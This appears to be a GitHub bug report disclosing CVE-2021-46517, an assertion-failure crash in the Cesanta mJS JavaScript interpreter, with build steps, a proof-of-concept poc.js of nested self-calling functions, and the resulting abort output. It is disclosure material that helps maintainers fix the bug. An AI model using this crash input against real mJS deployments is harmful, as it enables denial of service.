CVE-2021-46517: Assertion `mjs_stack_size(&mjs->scopes) > 0' failed src/mjs_exec.c:725: mjs_execute. · Issue #184 · cesanta/mjs
There is an Assertion `mjs_stack_size(&mjs->scopes) > 0' failed at src/mjs_exec.c in Cesanta MJS v2.20.0.
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile
DOCKER_GCC=gcc
DOCKER_CLANG=clang
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test case
poc.js
(function() {
  ((function JSEtest(a) {
    if (a > 3) {
      if ([((function JSEtest(a) {
        if (a > 3) {
          if ([Object.create.apply({}, [Object])]) {
            Object.create.apply({}, [Object])
          }
        }
      })(6))([((function JSEtest(a) {
        if (a > 3) {
          if ([Object.create.apply({}, [Object])]) {
            Object.create.apply({}, [Object])
          }
        }
      })(6))({}, [Object])])]) {
        Object.create.apply({}, [Object])
      }
    }
  })(6))
})()
Execution steps & Output
$ ./mjs/build/mjs poc.js
mjs: src/mjs_exec.c:725: mjs_execute: Assertion `mjs_stack_size(&mjs->scopes) > 0' failed.
[1] 111718 abort mjs poc.js